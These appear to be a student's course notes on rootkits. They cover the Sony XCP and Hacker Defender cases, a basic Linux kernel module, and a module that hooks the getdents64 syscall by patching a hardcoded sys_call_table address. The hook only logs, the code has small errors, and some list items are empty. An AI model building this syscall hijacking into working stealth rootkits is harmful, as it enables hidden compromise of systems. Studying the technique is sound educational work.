Notes from CPNT-260 at SAIT.

Set of code that allows someone to control aspects of the host operating system without revealing it’s presence. - Joseph Kong, Designing BSD Rootkits

A rootkit gives you the ability to hide files, processes and programs as if they were never installed on the computer. It can be used to:

In 2005, Sony published musc CD’s with a copy-protection software called “Extended Copy Protection (XCP)”. This was automatically installed after accepting the EULA. File, processes, registry keys and directories starting with $sys$ were ‘invisible’. This technique was later used by actual malware (Breplibot).

Hacker Defender (hxdef) is a rootkit for Microsoft Windows operating systems. It enables processes, files and registry keys to be hidden from system adminstrators and security scanning tools.

kernal modules

Used for:

Loadable kernel modules are much faster to maintain and debug. They are not much slower then base kernel modules.

hellomod.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
MODULE_LICENSE("Dual BSD/GPL");

static int __init hello_start(void)
{
  printk(KERN_INFO "Loading module...\n");
  return 0;
}

static void __exit hello_end(void)
{
  printk(KERN_INFO "goodbye\n");
}

module_init(hello_start);
module_exit(hello_end);
obj-m += hellomod.o
all:
  make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
  make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
$ make
$ sudo insmod ./hellomod.ko
$ tail -F /var/log/messages
$ sudo rmmod hellomod
$ lsmod

Hooking

Hooking is a programming technique that employs handler functions to modify control flow. When applied to system calls, this technique is often called “syscall hijacking”.

Locating the address of the syscall table in memory.

$ sudo cat /boot/System.map-`uname -r` | grep sys_call_table
ffffffff8170b180 R sys_call_table
ffffffff8170bd80 R ia32_sys_call_table

Or

$ sudo cat /proc/kallsyms | grep sys_call_table
ffffffff8170b180 R sys_call_table
ffffffff8170bd80 R ia32_sys_call_table

Let’s see if we can hook a syscall.

hellomod.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <asm/unistd.h>
#include <linux/syscalls.h>

MODULE_LICENSE("Dual BSD/GPL");

unsigned long *table=(unsigned long*)0xffffffff8170b180;
asmlinkage int (*o_getdents) (unsigned int fd, struct linux_direct *dirp, unsigned int count);

asmlinkage int our_getdents(unsigned int fd, struct linux_direct *dirp, unsigned int count) 
{
  printk(KERN_INFO "Hook: we're in.\n");
  return o_getdents(fd, dirp, count);
}

static int __init hello_start(void)
{
  printk(KERN_INFO "Loading module...\n");
  if (table[__NR_close] == (unsigned long) sys_close) {
    printk(KERN_INFO "Found it\n");
    o_getdents = table[__NR_getdents64];
    table[__NR_getdents64] = our_getdents;
    return 0;
  } 

  printk(KERN_INFO "Not Found\n");
  return -1;
}

static void __exit hello_end(void)
{
  table[__NR_getdents64] = o_getdents;
  printk(KERN_INFO "goodbye\n");
  return 0;
}

module_init(hello_start);
module_exit(hello_end);
comments powered by Disqus